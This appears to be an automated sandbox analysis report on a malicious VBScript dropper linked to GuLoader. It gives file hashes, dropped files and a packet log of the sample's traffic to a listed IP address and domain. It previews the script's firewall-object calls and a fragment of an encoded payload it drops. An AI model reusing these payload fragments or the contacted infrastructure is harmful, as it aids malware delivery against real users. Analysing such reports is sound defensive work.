                                          103.53.42.63
                                          		ftsengineers.comIndia
                                          		394695PUBLIC-DOMAIN-REGISTRYUSfalse

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1571032
                                          Start date and time:2024-12-08 19:26:03 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 4m 59s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:11
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:S1a5ZF3ytp.vbs
                                          renamed because original name is a hash value
                                          Original Sample Name:3f18b6b6686858e2d1707d38224c41129329efae694b883ac1cffa7617e30568.vbs
                                          Detection:MAL
                                          Classification:mal100.troj.expl.evad.winVBS@9/9@2/1
                                          EGA Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 70
                                          • Number of non-executed functions: 13
                                          Cookbook Comments:
                                          • Found application associated with file extension: .vbs

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded IPs from analysis (whitelisted): 2.22.50.144, 2.22.50.131, 2.22.50.151
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                          • Execution Graph export aborted for target powershell.exe, PID 1732 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 6640 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: S1a5ZF3ytp.vbs

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          13:26:56API Interceptor1x Sleep call for process: wscript.exe modified
                                          13:26:56API Interceptor1x Sleep call for process: WMIC.exe modified
                                          13:26:59API Interceptor87x Sleep call for process: powershell.exe modified
                                          13:28:35API Interceptor1475x Sleep call for process: conhost.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          103.53.42.63List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                            List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                              https://2itchyfeets.comGet hashmaliciousUnknownBrowse
                                                http://2itchyfeets.comGet hashmaliciousUnknownBrowse
                                                  Linux_x86Get hashmaliciousUnknownBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    PUBLIC-DOMAIN-REGISTRYUSList of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                    • 103.53.42.63
                                                    List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                    • 103.53.42.63
                                                    h0UP1BcPk5.lnkGet hashmaliciousUnknownBrowse
                                                    • 216.10.240.70
                                                    Ti5nuRV7y4.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                    • 119.18.54.39
                                                    m30zZYga23.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 208.91.199.223
                                                    PO82200487.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 199.79.62.115
                                                    ORDER#023_2024.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 199.79.62.115
                                                    QFEWElNtpn.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 199.79.62.115
                                                    SoA_14000048_002.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 199.79.62.115
                                                    Quote 000002320.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 199.79.62.115

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                    • 103.53.42.63
                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                    • 103.53.42.63
                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 103.53.42.63
                                                    file.exeGet hashmaliciousQuasarBrowse
                                                    • 103.53.42.63
                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                    • 103.53.42.63
                                                    ugjigghFzZ.exeGet hashmaliciousQuasarBrowse
                                                    • 103.53.42.63
                                                    spoolsv.exeGet hashmaliciousRedLine, StormKitty, XWormBrowse
                                                    • 103.53.42.63
                                                    2477.exeGet hashmaliciousNoCry, RedLine, StormKitty, XWormBrowse
                                                    • 103.53.42.63
                                                    BA9qyj2c9G.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                    • 103.53.42.63
                                                    List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                    • 103.53.42.63

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                    Download File
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                    Category:dropped
                                                    Size (bytes):71954
                                                    Entropy (8bit):7.996617769952133
                                                    Encrypted:true
                                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                    Download File
                                                    Process:C:\Windows\System32\wscript.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):328
                                                    Entropy (8bit):3.150184159866505
                                                    Encrypted:false
                                                    SSDEEP:6:kKr0kD9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:T0VDnLNkPlE99SNxAhUe/3
                                                    MD5:FD4EE41AFDA537C055105CD8BA8CA05D
                                                    SHA1:6EF258AD500500FA983545B3F9E4B5B1CC7D02A1
                                                    SHA-256:5CDBE19BCCC67C66C36BED208A86F9E8FE5E6E6C30508945F3C221ACE94D6E51
                                                    SHA-512:89527C60C3D1671CA79A243AC5E92C6A7BD100A2AAAFFBC4220A2A181DFEF6D73FD7A0F3550E1C4775ED14A5417AD7013B52E047AF076B97E25683F52959E17B
                                                    Malicious:false
                                                    Preview:p...... .........|..I..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):8003
                                                    Entropy (8bit):4.840877972214509
                                                    Encrypted:false
                                                    SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                    MD5:106D01F562D751E62B702803895E93E0
                                                    SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                    SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                    SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                    Malicious:false
                                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1940658735648508
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                    MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                    SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                    SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                    SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                    Malicious:false
                                                    Preview:@...e................................................@..........

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ak3t1omf.bzo.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iq1ofien.imm.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lyvtwpxy.mto.ps1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqcngjtw.muv.psm1

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Roaming\bethink.Sal

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):461264
                                                    Entropy (8bit):5.935880013697424
                                                    Encrypted:false
                                                    SSDEEP:12288:0KGK4Xd7QbEgkdEmXP5PM6wE3JiA7qYsO:0KG5Rjr/5UgJiqTx
                                                    MD5:A8D8FCD4EF4917F1C14562FBC14861BA
                                                    SHA1:0A73116E9BF6E750E9543A8C7AE7D19EFD95F863
                                                    SHA-256:07A1CF471F5FB3A1EA9DB9C67056F8CD2A8DE02B1B2B9490465F130B674997AE
                                                    SHA-512:BD8AAFBEF5C86FF81854C1FDF2EA679DD58BEDEDD81A86430DE6B172BB5152EB07CD80603D29B4DA340959CAE85193D65C89489DA0A2282DAF96232E950E802A
                                                    Malicious:false
                                                    Preview:cQGb6wKPKrt1owkA6wL2zusCYiADXCQE6wIbXXEBm7m3Y2ZfcQGbcQGbgenttiA8cQGbcQGbgfHKrEUj6wIGT3EBm3EBm+sC4eO6yNbaR+sCfdZxAZtxAZvrAsurMcrrAp7L6wJGI4kUC3EBm+sC6+jR4nEBm+sC7+SDwQTrAh+v6wJFH4H5S7+eAHzJ6wJpnnEBm4tEJARxAZvrAvOQicPrAiXt6wL1+YHDLrNsAHEBm+sCUdu6RmWpB+sCERVxAZuB8qRCOLVxAZvrAoQOgcIe2G5NcQGb6wJyu3EBm3EBm3EBm3EBm4sMEOsCpSFxAZuJDBNxAZvrAtVRQnEBm3EBm4H62NgEAHXXcQGbcQGbiVwkDHEBm3EBm4HtAAMAAHEBm3EBm4tUJAjrAiiicQGbi3wkBOsCCyjrAt9ZietxAZtxAZuBw5wAAADrAhOXcQGbU3EBm3EBm2pAcQGbcQGbievrAmkCcQGbx4MAAQAAAHCrAOsCCRNxAZuBwwABAABxAZvrAk4ZU3EBm3EBm4nrcQGbcQGbibsEAQAAcQGbcQGbgcMEAQAAcQGbcQGbU3EBm+sClzBq/+sCk9HrAoIug8IF6wJIAusCzzIx9usCFTBxAZsxyXEBm3EBm4sa6wJk7+sCIUhBcQGb6wKVVzkcCnXzcQGbcQGbRusCBj5xAZuAfAr7uHXecQGbcQGbi0QK/OsCD0/rAlO5KfBxAZvrAj4r/9LrAgyv6wJuyLrY2AQAcQGb6wJJCjHAcQGb6wKOqYt8JAxxAZtxAZuBNAdpDDAa6wL+5OsCPcyDwARxAZtxAZs50HXk6wKCTnEBm4n76wJ37nEBm//XcQGb6wLr3FHg2BppDDBB4On3X/T5Kw3EjUWHbtnXuuh5rZEQmoebLJG3UfBJfOUkkUXgPGrH3Dfjuf/t14mHdxRdm5gk+K0cjcGidje9fOzNsfOcxKSPwDKUD0yJ690tATB0p2Pamx0BMGw1aX4mWo1E

                                                    Static File Info

                                                    General

                                                    File type:ASCII text, with CRLF line terminators
                                                    Entropy (8bit):5.30019669839314
                                                    TrID:
                                                    • Visual Basic Script (13500/0) 100.00%
                                                    File name:S1a5ZF3ytp.vbs
                                                    File size:30'011 bytes
                                                    MD5:1a749c44eb48b9cdddcdd8e00a6bd866
                                                    SHA1:555ed2c58801e005bba67f38174006eb1a1ff31d
                                                    SHA256:3f18b6b6686858e2d1707d38224c41129329efae694b883ac1cffa7617e30568
                                                    SHA512:06e8648387dd9a0c53dd2cba0dbe17106b4e1087ff6e39022bef9d6cbf101f2cbd15448dfd308c8b110fc77e068aabed3054e3c3f6fee753f19c5de003055fc3
                                                    SSDEEP:384:NDQrl7+NIlfvinb5lgsZ2kzBv1yxJwbZoDEZQD6XjyVT:xK7Plnib5l15dNyxJwlotDueh
                                                    TLSH:A4D2F6655F8735012587F272CCEE1936BD88427206E134603CE5E35407CAABA77BDDEA
                                                    File Content Preview:....'mazurkaerne indkringsfase reflexives243! triptllers, realisationsprisen35!..........Set Udpeges = CreateObject("HNetCfg.FwMgr")....Set sowle = Udpeges.LocalPolicy.CurrentProfile....'Guruernes artikulatoriskes sparringpartneres lydside:..Set Ecbatic =

                                                    File Icon

                                                    Icon Hash:68d69b8f86ab9a86

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 8, 2024 19:27:01.135763884 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:01.135804892 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:01.135896921 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:01.142908096 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:01.142921925 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:03.068990946 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:03.069076061 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:03.182631016 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:03.182656050 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:03.182986021 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:03.220150948 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:03.267344952 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:03.899075031 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:03.899100065 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:03.899137020 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:03.899166107 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:03.899188995 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:03.899200916 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:03.941755056 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.161062002 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.161072969 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.161166906 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.186996937 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.187005997 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.187180996 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.221163988 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.221196890 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.221362114 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.406888962 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.406898975 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.407202005 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.424892902 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.425088882 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.447103977 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.447173119 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.476305962 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.476444006 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.498296022 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.498377085 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.520471096 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.520545006 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.542423010 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.542622089 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.657829046 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.658150911 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.671869040 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.672044992 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.681905031 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.681972980 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.689729929 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.689796925 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.697421074 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.697484970 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.705324888 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.705388069 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.714795113 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.714860916 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.722429991 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.722531080 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.730145931 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.730221033 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.769242048 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.769530058 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.782983065 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.783159018 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.791882038 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.791954041 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.852895975 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.852988958 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.862937927 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.863008976 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.909177065 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.909271955 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.913414955 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.913489103 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.917714119 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.917778969 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.923656940 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.923719883 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.927966118 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.928030968 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.932024002 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.932085991 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.936276913 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.936348915 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.942045927 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.942106962 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.946732998 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.946799040 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.951178074 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.951244116 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.955657005 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.955720901 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:04.960294008 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:04.960357904 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.084630013 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.084708929 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.088001013 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.088061094 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.097846985 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.097908974 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.101306915 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.101495028 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.106854916 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.106934071 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.111203909 CET44349731103.53.42.63192.168.2.4
                                                    Dec 8, 2024 19:27:05.111265898 CET49731443192.168.2.4103.53.42.63
                                                    Dec 8, 2024 19:27:05.115510941 CET44349731103.53.42.63192.168.2.4
